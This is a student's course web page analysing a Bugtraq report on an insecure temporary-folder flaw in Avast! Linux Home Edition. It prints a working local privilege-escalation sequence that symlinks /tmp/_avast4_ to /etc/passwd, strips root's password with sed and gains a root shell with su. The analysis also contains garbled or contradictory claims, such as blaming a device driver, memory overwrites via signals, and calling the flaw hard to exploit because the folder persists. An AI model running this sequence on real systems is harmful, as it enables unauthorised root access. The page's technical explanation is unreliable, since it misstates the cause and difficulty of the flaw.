Information Assurance

Clare M. Schramm

front | classes | research | personal | contact

Information Assurance

Bugtraq Analysis

Vulnerability on a Temporary Folder Creation in Avast! Linux Home Edition Product Link

Avast! is an anti-virus software program for the UNIX system. This vulnerability is of particular interest because any anti-virus software is supposed to prevent viruses, not make it easier for someone to access your computer!

The vulnerability occurs when the program scans for a virus. A temporary directory called /tmp is created in an insecure manner because it is assigned a chmod of 1777, which allows all users to read, write, and execute the file. This can create an entryway for local users to gain escalated privileges. Alternatively, the local users can use the escalated privileges to cause a Denial of Service, which is very annoying for the root user.

In order to exploit this vulnerability, a malicious user (who must be locally logged- in to the system) must create a sym link from /etc/passwd to /tmp/_avast4_ Here is a sample of how this is done:

$ ls -l /etc/passwd -rw-r--r-- 1 root root 1476 avr 14 15:30 /etc/passwd $ ln -s /etc/passwd /tmp/_avast4_ $ ll /tmp/_avast4_ lrwxrwxrwx 1 user user 11 avr 14 16:43 /tmp/_avast4_ -> /etc/passwd ... Waiting for user root to scan for virus (example: # avast -d /bin) ... $ ls -l /etc/passwd -rwxrwxrwt 1 root root 1476 avr 14 15:55 /etc/passwd (Oops!) $ sed s/^root:x:/root::/ /etc/passwd > /tmp/a.out $ cat /tmp/a.out > /etc/passwd $ su - # id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

Basically, this vulnerability is due to missing INPUT VALIDATION in the device driver. Thus, someone can overwrite arbitrary memory via signals with specially- created input! Hence why it is SO important to CHECK YOUR INPUT!!!

How should Avast! fix this critical vulnerability? The user can begin by not being connected to a local network so nobody could run the risk of gaining root privilege. But this is not always possible. Until a patch is developed which CHECKS FOR SYM LINKS or gives the file a MORE SECURE CHMOD, there's basically no protection for the user. However, this is an extremely difficult vulnerability for someone to take advantage of, considering as the "_avast4_" folder is not erased when the virus scan is finished. Also, the malicious user must act within a short period of time, because this distribution of software usually cleans the /tmp folder with the tmpwatch utility, which gets rid of all files older than a certain age.

MORAL OF THE STORY: PEOPLE ARE EVIL--BEWARE OF SYM LINKS!!! And always check for them when opening files to make your code secure!